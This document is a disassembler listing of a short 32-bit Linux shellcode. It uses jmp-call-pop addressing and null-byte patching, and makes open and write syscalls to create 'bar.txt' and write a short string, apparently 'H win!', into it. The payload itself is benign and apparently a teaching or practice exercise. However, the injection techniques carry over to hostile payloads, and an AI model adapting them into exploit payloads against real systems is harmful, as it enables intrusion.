08048308 <shellcode>:
 8048308:	eb 2b                	jmp    8048335 <ender>

0804830a <starter>:
 804830a:	31 d2                	xor    %edx,%edx
 804830c:	31 c9                	xor    %ecx,%ecx
 804830e:	31 c0                	xor    %eax,%eax
 8048310:	66 ba 24 01          	mov    $0x124,%dx
 8048314:	b1 42                	mov    $0x42,%cl
 8048316:	5b                   	pop    %ebx
 8048317:	83 6b 07 01          	subl   $0x1,0x7(%ebx)
 804831b:	83 43 08 01          	addl   $0x1,0x8(%ebx)
 804831f:	b0 05                	mov    $0x5,%al
 8048321:	cd 80                	int    $0x80
 8048323:	31 d2                	xor    %edx,%edx
 8048325:	31 c9                	xor    %ecx,%ecx
 8048327:	b2 06                	mov    $0x6,%dl
 8048329:	80 c3 08             	add    $0x8,%bl
 804832c:	89 d9                	mov    %ebx,%ecx
 804832e:	89 c3                	mov    %eax,%ebx
 8048330:	b0 04                	mov    $0x4,%al
 8048332:	cd 80                	int    $0x80
 8048334:	c3                   	ret    

08048335 <ender>:
 8048335:	e8 d0 ff ff ff       	call   804830a <starter>
 804833a:	62 61 72             	bound  %esp,0x72(%ecx)
 804833d:	2e 74 78             	je,pn  80483b8 <__libc_start_main+0x68>
 8048340:	74 00                	je     8048342 <ender+0xd>
 8048342:	48                   	dec    %eax
 8048343:	20 77 69             	and    %dh,0x69(%edi)
 8048346:	6e                   	outsb  %ds:(%esi),(%dx)
 8048347:	21 00                	and    %eax,(%eax)

